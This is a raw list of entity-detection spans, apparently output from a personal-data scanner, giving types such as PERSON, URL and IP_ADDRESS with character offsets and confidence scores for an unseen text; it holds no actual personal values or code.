PERSON, start: 2137, end: 2142, score: 0.85, type: LOCATION, start: 2239, end: 2248, score: 0.85, type: DATE_TIME, start: 2376, end: 2396, score: 0.85, type: DATE_TIME, start: 2641, end: 2643, score: 0.85, type: PERSON, start: 2961, end: 2983, score: 0.85, type: LOCATION, start: 3051, end: 3070, score: 0.85, type: PERSON, start: 3855, end: 3866, score: 0.85, type: PERSON, start: 4192, end: 4203, score: 0.85, type: DATE_TIME, start: 4309, end: 4330, score: 0.85, type: PERSON, start: 4361, end: 4372, score: 0.85, type: PERSON, start: 4603, end: 4614, score: 0.85, type: PERSON, start: 5564, end: 5572, score: 0.85, type: URL, start: 153, end: 204, score: 0.6, type: IP_ADDRESS, start: 2535, end: 2537, score: 0.6, type: IP_ADDRESS, start: 5376, end: 5385, score: 0.6, type: URL, start: 418, end: 427, score: 0.5, type: URL, start: 579, end: 586, score: 0.5, type: URL, start: 638, end: 645, score: 0.5, type: URL, start: 650, end: 
660, score: 0.5, type: URL, start: 904, end: 916, score: 0.5, type: URL, start: 975, end: 982, score: 0.5, type: URL, start: 1043, end: 1055, score: 0.5, type: URL, start: 1144, end: 1151, score: 0.5, type: URL, start: 1905, end: 1914, score: 0.5, type: URL, start: 2087, end: 2095, score: 0.5, type: URL, start: 2171, end: 2178, score: 0.5, type: URL, start: 2186, end: 2193, score: 0.5, type: URL, start: 2309, end: 2319, score: 0.5, type: URL, start: 2487, end: 2499, score: 0.5, type: URL, start: 2701, end: 2711, score: 0.5, type: URL, start: 2771, end: 2778, score: 0.5, type: URL, start: 2835, end: 2844, score: 0.5, type: URL, start: 2917, end: 2924, score: 0.5, type: URL, start: 3031, end: 3041, score: 0.5, type: URL, start: 3433, end: 3440, score: 0.5, type: URL, start: 3538, end: 3545, score: 0.5, type: URL, start: 3891, end: 3897, score: 0.5, type: URL, start: 3922, end: 3929, score: 0.5, type: URL, start: 4008, end: 4014, score: 0.5, type: URL, start: 4044, end: 4051, score: 0.5, type: URL, start: 4128, end: 4135, score: 0.5, type: URL, start: 4334, end: 4341, score: 0.5, type: URL, start: 4415, end: 4422, score: 0.5, type: URL, start: 4448, end: 4455, score: 0.5, type: URL, start: 4571, end: 4578, score: 0.5, type: URL, start: 4670, end: 4677, score: 0.5, type: URL, start: 4883, end: 4890, score: 0.5, type: URL, start: 4993, end: 4999, score: 0.5, type: URL, start: 5025, end: 5035, score: 0.5, type: URL, start: 5074, end: 5080, score: 0.5, type: URL, start: 5132, end: 5137, score: 0.5, type: URL, start: 5210, end: 5215, score: 0.5, type: URL, start: 5289, end: 5293, score: 0.5, type: URL, start: 5303, end: 5307, score: 0.5, type: URL, start: 5315, end: 5319, score: 0.5, type: URL, start: 6055, end: 6059, score: 0.5, type: URL, start: 6088, end: 6095, score: 0.5, type: URL, start: 6184, end: 6191, score: 0.5, type: URL, start: 6303, end: 6310, score: 0.5, type: URL, start: 6356, end: 6363, score: 0.5, type: IP_ADDRESS, start: 19786, end: 19795, score: 0.95, type: IP_ADDRESS, start: 20287, end: 20296, score: 0.95, type: IP_ADDRESS, start: 21852, end: 21864, score: 0.95, type: IP_ADDRESS, start: 21910, end: 21922, score: 0.95, type: IP_ADDRESS, start: 37213, end: 37221, score: 0.95, type: IP_ADDRESS, start: 37250, end: 37259, score: 0.95, type: IP_ADDRESS, start: 37311, end: 37323, score: 0.95, type: IP_ADDRESS, start: 37364, end: 37376, score: 0.95, type: IP_ADDRESS, start: 38376, end: 38388, score: 0.95, type: IP_ADDRESS, start: 38434, end: 38446, score: 0.95, type: IP_ADDRESS, start: 38934, end: 38943, score: 0.95, type: IP_ADDRESS, start: 39084, end: 39093, score: 0.95, type: IP_ADDRESS, start: 39251, end: 39263, score: 0.95, type: IP_ADDRESS, start: 39309, end: 39321, score: 0.95, type: IP_ADDRESS, start: 40602, end: 40611, score: 0.95, type: IP_ADDRESS, start: 42125, end: 42134, score: 0.95, type: PERSON, start: 853, end: 876, score: 0.85, type: PERSON, start: 1620, end: 1626, score: 0.85, type: PERSON, start: 3142, end: 3148, score: 0.85, type: PERSON, start: 7114, end: 7146, score: 0.85, type: PERSON, start: 7342, end: 7374, score: 0.85, type: PERSON, start: 7646, end: 7667, score: 0.85, type: LOCATION, start: 9658, end: 9686, score: 0.85, type: PERSON, start: 9752, end: 9778, score: 0.85, type: PERSON, start: 13717, end: 13726, score: 0.85, type: LOCATION, start: 13939, end: 13988, score: 0.85, type: LOCATION, start: 14377, end: 14426, score: 0.85, type: LOCATION, start: 14650, end: 14699, score: 0.85, type: PERSON, start: 17000, end: 17032, score: 0.85, type: LOCATION, start: 
17202, end: 17213, score: 0.85, type: LOCATION, start: 17433, end: 17444, score: 0.85, type: PERSON, start: 18410, end: 18421, score: 0.85, type: LOCATION, start: 18600, end: 18649, score: 0.85, type: PERSON, start: 18773, end: 18799, score: 0.85, type: PERSON, start: 19207, end: 19233, score: 0.85, type: PERSON, start: 19643, end: 19669, score: 0.85, type: PERSON, start: 20144, end: 20170, score: 0.85, type: LOCATION, start: 23632, end: 23681, score: 0.85, type: LOCATION, start: 23981, end: 24030, score: 0.85, type: PERSON, start: 27854, end: 27886, score: 0.85, type: PERSON, start: 28480, end: 28486, score: 0.85, type: PERSON, start: 29034, end: 29040, score: 0.85, type: PERSON, start: 29235, end: 29267, score: 0.85, type: PERSON, start: 29715, end: 29721, score: 0.85, type: PERSON, start: 29879, end: 29911, score: 0.85, type: PERSON, start: 30401, end: 30407, score: 0.85, type: PERSON, start: 30754, end: 30786, score: 0.85, type: PERSON, start: 31517, end: 31523, score: 0.85, type: PERSON, start: 31951, end: 31983, score: 0.85, type: PERSON, start: 32477, end: 32483, score: 0.85, type: PERSON, start: 32837, end: 32869, score: 0.85, type: PERSON, start: 33272, end: 33276, score: 0.85, type: PERSON, start: 33695, end: 33701, score: 0.85, type: PERSON, start: 34406, end: 34438, score: 0.85, type: PERSON, start: 34480, end: 34512, score: 0.85, type: PERSON, start: 35025, end: 35057, score: 0.85, type: PERSON, start: 35466, end: 35472, score: 0.85, type: PERSON, start: 35860, end: 35892, score: 0.85, type: PERSON, start: 36274, end: 36306, score: 0.85, type: PERSON, start: 36828, end: 36860, score: 0.85, type: PERSON, start: 40195, end: 40227, score: 0.85, type: PERSON, start: 41150, end: 41189, score: 0.85, type: PERSON, start: 41718, end: 41750, score: 0.85, type: PERSON, start: 42680, end: 42684, score: 0.85, type: PERSON, start: 43031, end: 43074, score: 0.85, type: PERSON, start: 43635, end: 43667, score: 0.85, type: PERSON, start: 44882, end: 44888, score: 0.85, type: PERSON, start: 46001, end: 46007, score: 0.85, type: PERSON, start: 46160, end: 46203, score: 0.85, type: PERSON, start: 46514, end: 46564, score: 0.85, type: PERSON, start: 46784, end: 46816, score: 0.85, type: PERSON, start: 47307, end: 47339, score: 0.85, type: PERSON, start: 50903, end: 50935, score: 0.85, type: PERSON, start: 51115, end: 51147, score: 0.85, type: PERSON, start: 51527, end: 51559, score: 0.85, type: PERSON, start: 52406, end: 52430, score: 0.85, type: PERSON, start: 52925, end: 52949, score: 0.85, type: PERSON, start: 56092, end: 56124, score: 0.85, type: PERSON, start: 57090, end: 57122, score: 0.85, type: PERSON, start: 57723, end: 57729, score: 0.85, type: DATE_TIME, start: 62055, end: 62079, score: 0.85, type: DATE_TIME, start: 1116, end: 1126, score: 0.6, type: DATE_TIME, start: 7260, end: 7270, score: 0.6, type: IP_ADDRESS, start: 17077, end: 17085, score: 0.6, type: IP_ADDRESS, start: 17134, end: 17142, score: 0.6, type: IP_ADDRESS, start: 17308, end: 17316, score: 0.6, type: IP_ADDRESS, start: 17365, end: 17373, score: 0.6, type: IP_ADDRESS, start: 40271, end: 40279, score: 0.6, type: IP_ADDRESS, start: 40326, end: 40334, score: 0.6, type: IP_ADDRESS, start: 41794, end: 41802, score: 0.6, type: IP_ADDRESS, start: 41849, end: 41857, score: 0.6, type: IP_ADDRESS, start: 43711, end: 43719, score: 0.6, type: IP_ADDRESS, start: 43766, end: 43774, score: 0.6, type: URL, start: 204, end: 215, score: 0.5, type: URL, start: 498, end: 504, score: 0.5, type: URL, start: 527, end: 536, score: 0.5, type: 
URL, start: 573, end: 582, score: 0.5, type: URL, start: 681, end: 688, score: 0.5, type: URL, start: 739, end: 746, score: 0.5, type: URL, start: 860, end: 867, score: 0.5, type: URL, start: 898, end: 905, score: 0.5, type: URL, start: 1016, end: 1028, score: 0.5, type: URL, start: 1212, end: 1223, score: 0.5, type: URL, start: 1323, end: 1330, score: 0.5, type: URL, start: 1376, end: 1387, score: 0.5, type: URL, start: 1391, end: 1398, score: 0.5, type: URL, start: 1432, end: 1450, score: 0.5, type: URL, start: 1470, end: 1489, score: 0.5, type: URL, start: 1665, end: 1672, score: 0.5, type: URL, start: 1704, end: 1725, score: 0.5, type: URL, start: 1745, end: 1769, score: 0.5, type: URL, start: 1807, end: 1821, score: 0.5, type: URL, start: 1836, end: 1853, score: 0.5, type: URL, start: 1895, end: 1902, score: 0.5, type: URL, start: 1927, end: 1942, score: 0.5, type: URL, start: 1984, end: 1990, score: 0.5, type: URL, start: 2001, end: 2015, score: 0.5, type: URL, start: 2063, end: 2075, score: 0.5, type: URL, start: 2130, end: 2144, score: 0.5, type: URL, start: 2155, end: 2166, score: 0.5, type: URL, start: 2172, end: 2189, score: 0.5, type: URL, start: 2215, end: 2226, score: 0.5, type: URL, start: 2231, end: 2238, score: 0.5, type: URL, start: 2294, end: 2299, score: 0.5, type: URL, start: 2322, end: 2343, score: 0.5, type: URL, start: 2392, end: 2403, score: 0.5, type: URL, start: 2469, end: 2479, score: 0.5, type: URL, start: 2585, end: 2597, score: 0.5, type: URL, start: 2627, end: 2634, score: 0.5, type: URL, start: 2679, end: 2688, score: 0.5, type: URL, start: 2693, end: 2700, score: 0.5, type: URL, start: 2707, end: 2712, score: 0.5, type: URL, start: 2723, end: 2734, score: 0.5, type: URL, start: 2740, end: 2756, score: 0.5, type: URL, start: 2860, end: 2871, score: 0.5, type: URL, start: 2892, end: 2903, score: 0.5, type: URL, start: 2907, end: 2914, score: 0.5, type: URL, start: 2948, end: 2966, score: 0.5, type: URL, start: 2986, end: 3005, score: 0.5, type: URL, start: 3199, end: 3210, score: 0.5, type: URL, start: 3233, end: 3240, score: 0.5, type: URL, start: 3309, end: 3326, score: 0.5, type: URL, start: 3430, end: 3438, score: 0.5, type: URL, start: 3483, end: 3494, score: 0.5, type: URL, start: 3845, end: 3864, score: 0.5, type: URL, start: 4010, end: 4029, score: 0.5, type: URL, start: 4119, end: 4127, score: 0.5, type: URL, start: 4172, end: 4183, score: 0.5, type: URL, start: 4535, end: 4554, score: 0.5, type: URL, start: 4700, end: 4719, score: 0.5, type: URL, start: 4814, end: 4822, score: 0.5, type: URL, start: 4867, end: 4878, score: 0.5, type: URL, start: 5131, end: 5150, score: 0.5, type: URL, start: 5374, end: 5389, score: 0.5, type: URL, start: 5490, end: 5498, score: 0.5, type: URL, start: 5542, end: 5553, score: 0.5, type: URL, start: 5867, end: 5886, score: 0.5, type: URL, start: 5910, end: 5921, score: 0.5, type: URL, start: 6100, end: 6119, score: 0.5, type: URL, start: 6207, end: 6215, score: 0.5, type: URL, start: 6259, end: 6270, score: 0.5, type: URL, start: 6494, end: 6513, score: 0.5, type: URL, start: 6577, end: 6588, score: 0.5, type: URL, start: 6655, end: 6666, score: 0.5, type: URL, start: 6704, end: 6724, score: 0.5, type: URL, start: 6741, end: 6752, score: 0.5, type: URL, start: 6823, end: 6834, score: 0.5, type: URL, start: 6992, end: 7003, score: 0.5, type: URL, start: 7121, end: 7128, score: 0.5, type: URL, start: 7182, end: 7199, score: 0.5, type: URL, start: 7212, end: 7222, score: 0.5, type: URL, start: 7349, end: 7356, score: 
0.5, type: URL, start: 7409, end: 7416, score: 0.5, type: URL, start: 7459, end: 7473, score: 0.5, type: URL, start: 7496, end: 7503, score: 0.5, type: URL, start: 7529, end: 7543, score: 0.5, type: URL, start: 7551, end: 7558, score: 0.5, type: URL, start: 7563, end: 7574, score: 0.5, type: URL, start: 7618, end: 7625, score: 0.5, type: URL, start: 7651, end: 7665, score: 0.5, type: URL, start: 7673, end: 7680, score: 0.5, type: URL, start: 7685, end: 7696, score: 0.5, type: URL, start: 7740, end: 7747, score: 0.5, type: URL, start: 7774, end: 7788, score: 0.5, type: URL, start: 7796, end: 7803, score: 0.5, type: URL, start: 7808, end: 7819, score: 0.5, type: URL, start: 7872, end: 7879, score: 0.5, type: URL, start: 7971, end: 7981, score: 0.5, type: URL, start: 8018, end: 8025, score: 0.5, type: URL, start: 8129, end: 8133, score: 0.5, type: URL, start: 8138, end: 8145, score: 0.5, type: URL, start: 8152, end: 8157, score: 0.5, type: URL, start: 8168, end: 8179, score: 0.5, type: URL, start: 8236, end: 8240, score: 0.5, type: URL, start: 8245, end: 8252, score: 0.5, type: URL, start: 8257, end: 8264, score: 0.5, type: URL, start: 8275, end: 8286, score: 0.5, type: URL, start: 8352, end: 8356, score: 0.5, type: URL, start: 8361, end: 8368, score: 0.5, type: URL, start: 8379, end: 8390, score: 0.5, type: URL, start: 8409, end: 8425, score: 0.5, type: URL, start: 8436, end: 8454, score: 0.5, type: URL, start: 8466, end: 8477, score: 0.5, type: URL, start: 8564, end: 8571, score: 0.5, type: URL, start: 8601, end: 8608, score: 0.5, type: URL, start: 8676, end: 8690, score: 0.5, type: URL, start: 8718, end: 8725, score: 0.5, type: URL, start: 8758, end: 8770, score: 0.5, type: URL, start: 8777, end: 8792, score: 0.5, type: URL, start: 8853, end: 8877, score: 0.5, type: URL, start: 8904, end: 8918, score: 0.5, type: URL, start: 8928, end: 8934, score: 0.5, type: URL, start: 8945, end: 8957, score: 0.5, type: URL, start: 8979, end: 8986, score: 0.5, type: URL, start: 9019, end: 9031, score: 0.5, type: URL, start: 9033, end: 9045, score: 0.5, type: URL, start: 9052, end: 9067, score: 0.5, type: URL, start: 9128, end: 9152, score: 0.5, type: URL, start: 9195, end: 9206, score: 0.5, type: URL, start: 9223, end: 9237, score: 0.5, type: URL, start: 9259, end: 9265, score: 0.5, type: URL, start: 9277, end: 9289, score: 0.5, type: URL, start: 9291, end: 9303, score: 0.5, type: URL, start: 9431, end: 9438, score: 0.5, type: URL, start: 9471, end: 9483, score: 0.5, type: URL, start: 9504, end: 9520, score: 0.5, type: URL, start: 9532, end: 9552, score: 0.5, type: URL, start: 9565, end: 9583, score: 0.5, type: URL, start: 9603, end: 9614, score: 0.5, type: URL, start: 9620, end: 9625, score: 0.5, type: URL, start: 9630, end: 9639, score: 0.5, type: URL, start: 9703, end: 9711, score: 0.5, type: URL, start: 9759, end: 9767, score: 0.5, type: URL, start: 9827, end: 9834, score: 0.5, type: URL, start: 9908, end: 9917, score: 0.5, type: URL, start: 9993, end: 10008, score: 0.5, type: URL, start: 10076, end: 10084, score: 0.5, type: URL, start: 10089, end: 10098, score: 0.5, type: URL, start: 10113, end: 10122, score: 0.5, type: URL, start: 10212, end: 10227, score: 0.5, type: URL, start: 10282, end: 10290, score: 0.5, type: URL, start: 10346, end: 10354, score: 0.5, type: URL, start: 10407, end: 10413, score: 0.5, type: URL, start: 11144, end: 11151, score: 0.5, type: URL, start: 11181, end: 11188, score: 0.5, type: URL, start: 11267, end: 11281, score: 0.5, type: URL, start: 11320, end: 11332, score: 0.5, 
type: URL, start: 11355, end: 11362, score: 0.5, type: URL, start: 11429, end: 11444, score: 0.5, type: URL, start: 11578, end: 11589, score: 0.5, type: URL, start: 11673, end: 11685, score: 0.5, type: URL, start: 11687, end: 11699, score: 0.5, type: URL, start: 11723, end: 11730, score: 0.5, type: URL, start: 11759, end: 11771, score: 0.5, type: URL, start: 11827, end: 11842, score: 0.5, type: URL, start: 11885, end: 11896, score: 0.5, type: URL, start: 11953, end: 11959, score: 0.5, type: URL, start: 11971, end: 11983, score: 0.5, type: URL, start: 12006, end: 12013, score: 0.5, type: URL, start: 12042, end: 12054, score: 0.5, type: URL, start: 12222, end: 12229, score: 0.5, type: URL, start: 12269, end: 12282, score: 0.5, type: URL, start: 12310, end: 12317, score: 0.5, type: URL, start: 12323, end: 12343, score: 0.5, type: URL, start: 12412, end: 12422, score: 0.5, type: URL, start: 12532, end: 12539, score: 0.5, type: URL, start: 12569, end: 12576, score: 0.5, type: URL, start: 12655, end: 12669, score: 0.5, type: URL, start: 12697, end: 12704, score: 0.5, type: URL, start: 12747, end: 12759, score: 0.5, type: URL, start: 12837, end: 12850, score: 0.5, type: URL, start: 12905, end: 12911, score: 0.5, type: URL, start: 12922, end: 12934, score: 0.5, type: URL, start: 12956, end: 12963, score: 0.5, type: URL, start: 13016, end: 13028, score: 0.5, type: URL, start: 13030, end: 13042, score: 0.5, type: URL, start: 13115, end: 13128, score: 0.5, type: URL, start: 13171, end: 13178, score: 0.5, type: URL, start: 13245, end: 13260, score: 0.5, type: URL, start: 13370, end: 13377, score: 0.5, type: URL, start: 13408, end: 13415, score: 0.5, type: URL, start: 13458, end: 13463, score: 0.5, type: URL, start: 13485, end: 13500, score: 0.5, type: URL, start: 13530, end: 13537, score: 0.5, type: URL, start: 13580, end: 13585, score: 0.5, type: URL, start: 13607, end: 13622, score: 0.5, type: URL, start: 13652, end: 13659, score: 0.5, type: URL, start: 13729, end: 13744, score: 0.5, type: URL, start: 13775, end: 13782, score: 0.5, type: URL, start: 13828, end: 13833, score: 0.5, type: URL, start: 13897, end: 13912, score: 0.5, type: URL, start: 13954, end: 13967, score: 0.5, type: URL, start: 14009, end: 14022, score: 0.5, type: URL, start: 14171, end: 14183, score: 0.5, type: URL, start: 14185, end: 14197, score: 0.5, type: URL, start: 14221, end: 14228, score: 0.5, type: URL, start: 14335, end: 14350, score: 0.5, type: URL, start: 14392, end: 14405, score: 0.5, type: URL, start: 14460, end: 14466, score: 0.5, type: URL, start: 14477, end: 14489, score: 0.5, type: URL, start: 14511, end: 14518, score: 0.5, type: URL, start: 14586, end: 14591, score: 0.5, type: URL, start: 14608, end: 14623, score: 0.5, type: URL, start: 14665, end: 14678, score: 0.5, type: URL, start: 14720, end: 14733, score: 0.5, type: URL, start: 14775, end: 14788, score: 0.5, type: URL, start: 15001, end: 15013, score: 0.5, type: URL, start: 15015, end: 15027, score: 0.5, type: URL, start: 15029, end: 15041, score: 0.5, type: URL, start: 15065, end: 15072, score: 0.5, type: URL, start: 15176, end: 15191, score: 0.5, type: URL, start: 15299, end: 15306, score: 0.5, type: URL, start: 15336, end: 15343, score: 0.5, type: URL, start: 15422, end: 15436, score: 0.5, type: URL, start: 15448, end: 15460, score: 0.5, type: URL, start: 15511, end: 15518, score: 0.5, type: URL, start: 15577, end: 15586, score: 0.5, type: URL, start: 15698, end: 15711, score: 0.5, type: URL, start: 15743, end: 15755, score: 0.5, type: URL, start: 15757, 
end: 15769, score: 0.5, type: URL, start: 15799, end: 15803, score: 0.5, type: URL, start: 15867, end: 15874, score: 0.5, type: URL, start: 15999, end: 16012, score: 0.5, type: URL, start: 16067, end: 16073, score: 0.5, type: URL, start: 16084, end: 16096, score: 0.5, type: URL, start: 16189, end: 16196, score: 0.5, type: URL, start: 16226, end: 16233, score: 0.5, type: URL, start: 16301, end: 16315, score: 0.5, type: URL, start: 16327, end: 16334, score: 0.5, type: URL, start: 16367, end: 16379, score: 0.5, type: URL, start: 16459, end: 16466, score: 0.5, type: URL, start: 16568, end: 16575, score: 0.5, type: URL, start: 16678, end: 16691, score: 0.5, type: URL, start: 16757, end: 16763, score: 0.5, type: URL, start: 16774, end: 16786, score: 0.5, type: URL, start: 16818, end: 16831, score: 0.5, type: URL, start: 16896, end: 16902, score: 0.5, type: URL, start: 16913, end: 16925, score: 0.5, type: URL, start: 17007, end: 17014, score: 0.5, type: URL, start: 17060, end: 17067, score: 0.5, type: URL, start: 17105, end: 17112, score: 0.5, type: URL, start: 17124, end: 17131, score: 0.5, type: URL, start: 17167, end: 17174, score: 0.5, type: URL, start: 17225, end: 17235, score: 0.5, type: URL, start: 17253, end: 17268, score: 0.5, type: URL, start: 17291, end: 17298, score: 0.5, type: URL, start: 17336, end: 17343, score: 0.5, type: URL, start: 17355, end: 17362, score: 0.5, type: URL, start: 17398, end: 17405, score: 0.5, type: URL, start: 17456, end: 17466, score: 0.5, type: URL, start: 17484, end: 17499, score: 0.5, type: URL, start: 17531, end: 17538, score: 0.5, type: URL, start: 17576, end: 17583, score: 0.5, type: URL, start: 17590, end: 17606, score: 0.5, type: URL, start: 17649, end: 17662, score: 0.5, type: URL, start: 17718, end: 17724, score: 0.5, type: URL, start: 17735, end: 17747, score: 0.5, type: URL, start: 17787, end: 17792, score: 0.5, type: URL, start: 17803, end: 17810, score: 0.5, type: URL, start: 17853, end: 17858, score: 0.5, type: URL, start: 17869, end: 17879, score: 0.5, type: URL, start: 17902, end: 17909, score: 0.5, type: URL, start: 17947, end: 17954, score: 0.5, type: URL, start: 17961, end: 17977, score: 0.5, type: URL, start: 18020, end: 18033, score: 0.5, type: URL, start: 18089, end: 18095, score: 0.5, type: URL, start: 18106, end: 18118, score: 0.5, type: URL, start: 18158, end: 18163, score: 0.5, type: URL, start: 18174, end: 18181, score: 0.5, type: URL, start: 18224, end: 18229, score: 0.5, type: URL, start: 18240, end: 18250, score: 0.5, type: URL, start: 18338, end: 18345, score: 0.5, type: URL, start: 18375, end: 18382, score: 0.5, type: URL, start: 18438, end: 18452, score: 0.5, type: URL, start: 18480, end: 18487, score: 0.5, type: URL, start: 18615, end: 18628, score: 0.5, type: URL, start: 18724, end: 18732, score: 0.5, type: URL, start: 18780, end: 18788, score: 0.5, type: URL, start: 18819, end: 18826, score: 0.5, type: URL, start: 18909, end: 18918, score: 0.5, type: URL, start: 19158, end: 19166, score: 0.5, type: URL, start: 19214, end: 19222, score: 0.5, type: URL, start: 19253, end: 19260, score: 0.5, type: URL, start: 19343, end: 19352, score: 0.5, type: URL, start: 19594, end: 19602, score: 0.5, type: URL, start: 19650, end: 19658, score: 0.5, type: URL, start: 19689, end: 19696, score: 0.5, type: URL, start: 19822, end: 19831, score: 0.5, type: URL, start: 19907, end: 19926, score: 0.5, type: URL, start: 20095, end: 20103, score: 0.5, type: URL, start: 20151, end: 20159, score: 0.5, type: URL, start: 20190, end: 20197, score: 0.5, 
type: URL, start: 20323, end: 20332, score: 0.5, type: URL, start: 20407, end: 20427, score: 0.5, type: URL, start: 20472, end: 20505, score: 0.5, type: URL, start: 20702, end: 20710, score: 0.5, type: URL, start: 20751, end: 20760, score: 0.5, type: URL, start: 20825, end: 20834, score: 0.5, type: URL, start: 20955, end: 20964, score: 0.5, type: URL, start: 21009, end: 21020, score: 0.5, type: URL, start: 21217, end: 21225, score: 0.5, type: URL, start: 21278, end: 21287, score: 0.5, type: URL, start: 21388, end: 21397, score: 0.5, type: URL, start: 21518, end: 21527, score: 0.5, type: URL, start: 21572, end: 21583, score: 0.5, type: URL, start: 21769, end: 21777, score: 0.5, type: URL, start: 21940, end: 21949, score: 0.5, type: URL, start: 22030, end: 22039, score: 0.5, type: URL, start: 22141, end: 22150, score: 0.5, type: URL, start: 22265, end: 22274, score: 0.5, type: URL, start: 22381, end: 22396, score: 0.5, type: URL, start: 22496, end: 22503, score: 0.5, type: URL, start: 22533, end: 22540, score: 0.5, type: URL, start: 22619, end: 22633, score: 0.5, type: URL, start: 22645, end: 22657, score: 0.5, type: URL, start: 22685, end: 22697, score: 0.5, type: URL, start: 22725, end: 22737, score: 0.5, type: URL, start: 22765, end: 22777, score: 0.5, type: URL, start: 22810, end: 22822, score: 0.5, type: URL, start: 22866, end: 22873, score: 0.5, type: URL, start: 22982, end: 22997, score: 0.5, type: URL, start: 23040, end: 23047, score: 0.5, type: URL, start: 23178, end: 23193, score: 0.5, type: URL, start: 23235, end: 23248, score: 0.5, type: URL, start: 23303, end: 23309, score: 0.5, type: URL, start: 23320, end: 23332, score: 0.5, type: URL, start: 23366, end: 23372, score: 0.5, type: URL, start: 23383, end: 23395, score: 0.5, type: URL, start: 23417, end: 23424, score: 0.5, type: URL, start: 23590, end: 23605, score: 0.5, type: URL, start: 23647, end: 23660, score: 0.5, type: URL, start: 23715, end: 23721, score: 0.5, type: URL, start: 23732, end: 23744, score: 0.5, type: URL, start: 23766, end: 23773, score: 0.5, type: URL, start: 23939, end: 23954, score: 0.5, type: URL, start: 23996, end: 24009, score: 0.5, type: URL, start: 24064, end: 24070, score: 0.5, type: URL, start: 24081, end: 24093, score: 0.5, type: URL, start: 24115, end: 24122, score: 0.5, type: URL, start: 24288, end: 24303, score: 0.5, type: URL, start: 24345, end: 24358, score: 0.5, type: URL, start: 24413, end: 24419, score: 0.5, type: URL, start: 24430, end: 24442, score: 0.5, type: URL, start: 24476, end: 24482, score: 0.5, type: URL, start: 24493, end: 24505, score: 0.5, type: URL, start: 24590, end: 24597, score: 0.5, type: URL, start: 24627, end: 24634, score: 0.5, type: URL, start: 24713, end: 24727, score: 0.5, type: URL, start: 24739, end: 24751, score: 0.5, type: URL, start: 24779, end: 24791, score: 0.5, type: URL, start: 24819, end: 24831, score: 0.5, type: URL, start: 24859, end: 24871, score: 0.5, type: URL, start: 24904, end: 24916, score: 0.5, type: URL, start: 24960, end: 24967, score: 0.5, type: URL, start: 25077, end: 25092, score: 0.5, type: URL, start: 25135, end: 25142, score: 0.5, type: URL, start: 25274, end: 25289, score: 0.5, type: URL, start: 25331, end: 25344, score: 0.5, type: URL, start: 25399, end: 25405, score: 0.5, type: URL, start: 25416, end: 25428, score: 0.5, type: URL, start: 25462, end: 25468, score: 0.5, type: URL, start: 25479, end: 25491, score: 0.5, type: URL, start: 25513, end: 25520, score: 0.5, type: URL, start: 25702, end: 25717, score: 0.5, type: URL, start: 25759, 
end: 25772, score: 0.5, type: URL, start: 25827, end: 25833, score: 0.5, type: URL, start: 25844, end: 25856, score: 0.5, type: URL, start: 25890, end: 25896, score: 0.5, type: URL, start: 25907, end: 25919, score: 0.5, type: URL, start: 25953, end: 25959, score: 0.5, type: URL, start: 25970, end: 25982, score: 0.5, type: URL, start: 26004, end: 26011, score: 0.5, type: URL, start: 26178, end: 26193, score: 0.5, type: URL, start: 26235, end: 26248, score: 0.5, type: URL, start: 26303, end: 26309, score: 0.5, type: URL, start: 26320, end: 26332, score: 0.5, type: URL, start: 26366, end: 26372, score: 0.5, type: URL, start: 26383, end: 26395, score: 0.5, type: URL, start: 26479, end: 26486, score: 0.5, type: URL, start: 26516, end: 26523, score: 0.5, type: URL, start: 26602, end: 26616, score: 0.5, type: URL, start: 26628, end: 26640, score: 0.5, type: URL, start: 26658, end: 26670, score: 0.5, type: URL, start: 26688, end: 26700, score: 0.5, type: URL, start: 26718, end: 26730, score: 0.5, type: URL, start: 26749, end: 26761, score: 0.5, type: URL, start: 26795, end: 26802, score: 0.5, type: URL, start: 26908, end: 26923, score: 0.5, type: URL, start: 26966, end: 26973, score: 0.5, type: URL, start: 27101, end: 27116, score: 0.5, type: URL, start: 27158, end: 27171, score: 0.5, type: URL, start: 27226, end: 27232, score: 0.5, type: URL, start: 27243, end: 27255, score: 0.5, type: URL, start: 27289, end: 27295, score: 0.5, type: URL, start: 27306, end: 27318, score: 0.5, type: URL, start: 27340, end: 27347, score: 0.5, type: URL, start: 27509, end: 27524, score: 0.5, type: URL, start: 27566, end: 27579, score: 0.5, type: URL, start: 27634, end: 27640, score: 0.5, type: URL, start: 27651, end: 27663, score: 0.5, type: URL, start: 27697, end: 27703, score: 0.5, type: URL, start: 27714, end: 27726, score: 0.5, type: URL, start: 27760, end: 27766, score: 0.5, type: URL, start: 27777, end: 27789, score: 0.5, type: URL, start: 27861, end: 27868, score: 0.5, type: URL, start: 27921, end: 27928, score: 0.5, type: URL, start: 27985, end: 27999, score: 0.5, type: URL, start: 28011, end: 28023, score: 0.5, type: URL, start: 28067, end: 28078, score: 0.5, type: URL, start: 28183, end: 28190, score: 0.5, type: URL, start: 28235, end: 28246, score: 0.5, type: URL, start: 28250, end: 28257, score: 0.5, type: URL, start: 28291, end: 28309, score: 0.5, type: URL, start: 28329, end: 28348, score: 0.5, type: URL, start: 28531, end: 28538, score: 0.5, type: URL, start: 28613, end: 28630, score: 0.5, type: URL, start: 28730, end: 28737, score: 0.5, type: URL, start: 28788, end: 28799, score: 0.5, type: URL, start: 28803, end: 28810, score: 0.5, type: URL, start: 28844, end: 28862, score: 0.5, type: URL, start: 28882, end: 28901, score: 0.5, type: URL, start: 29085, end: 29092, score: 0.5, type: URL, start: 29149, end: 29158, score: 0.5, type: URL, start: 29242, end: 29249, score: 0.5, type: URL, start: 29302, end: 29309, score: 0.5, type: URL, start: 29352, end: 29366, score: 0.5, type: URL, start: 29434, end: 29445, score: 0.5, type: URL, start: 29468, end: 29479, score: 0.5, type: URL, start: 29483, end: 29490, score: 0.5, type: URL, start: 29524, end: 29542, score: 0.5, type: URL, start: 29562, end: 29581, score: 0.5, type: URL, start: 29746, end: 29757, score: 0.5, type: URL, start: 29768, end: 29785, score: 0.5, type: URL, start: 29886, end: 29893, score: 0.5, type: URL, start: 29946, end: 29953, score: 0.5, type: URL, start: 29996, end: 30010, score: 0.5, type: URL, start: 30078, end: 30089, score: 0.5, 
